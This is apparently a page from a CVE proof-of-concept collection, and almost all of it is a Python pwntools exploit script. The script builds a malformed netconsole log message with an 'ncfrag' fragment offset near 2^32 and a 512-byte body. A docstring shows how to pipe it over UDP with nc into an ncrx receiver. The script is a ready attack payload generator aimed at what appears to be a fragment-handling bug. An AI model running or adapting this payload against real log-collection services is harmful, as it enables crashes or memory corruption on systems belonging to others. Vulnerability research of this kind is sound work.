4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3

import argparse
from pwn import *


class Exploit:
    def __init__(self):
        self.num_messages = 0

    def conn(self, port):
        return remote('localhost', port)

    def craft_message(self, meta_dict={'UNAME': 'ubuntu'}):
        header = self.craft_msg_header()
        body = self.craft_msg_body('a' * 512, meta_dict)
        self.num_messages += 1
        return header + body

    def craft_msg_header(self, seqnum=0):
        # /* [release,]<level>,<sequnum>,<timestamp>,<contflag>[,KEY=VAL]* */
        facility, level = 0, 3
        faclev = facility << 3 | level
        sequnum = 0
        ts_usec = int(time.monotonic() * (10 ** 6))
        return '{},{},{},{},{};'.format(
            faclev,
            sequnum,
            ts_usec,
            '-',
            'ncfrag={}/{}'.format((1 << 32) - 0xff, 1 << 9)
        )

    def craft_msg_body(self, text, meta_dict):
        text = text.replace('\0', '\n')
        dict_string = '\0'.join('{}={}'.format(k, v) \
                                for k, v in meta_dict.items())
        dict_string = dict_string.replace('\0', '\n')
        return '{}\n{}'.format(text, dict_string)


    def payload_gen(self):
        """Usage:
            on the other shell: ./ncrx 31337
            on this sheel: ./exploit | nc -u 127.0.0.1 31337
        """

        return self.craft_message()



def main():
    parser = argparse.ArgumentParser()
    mode = parser.add_mutually_exclusive_group(required=True)
    mode.add_argument('--generate', '-g', action='store_true')
    mode.add_argument('--remote', action='store_true')
    args = parser.parse_args()

    if args.remote:
        print('remote mode not supported')
        quit()

    exp = Exploit()

    if args.generate:
        # payload generation mode
        for _ in range(1):
            print(exp.payload_gen(), flush=True)
            time.sleep(1)
    elif args.remote:
        print('not supported')


if __name__ == '__main__':
    main()
    # exp.exploit()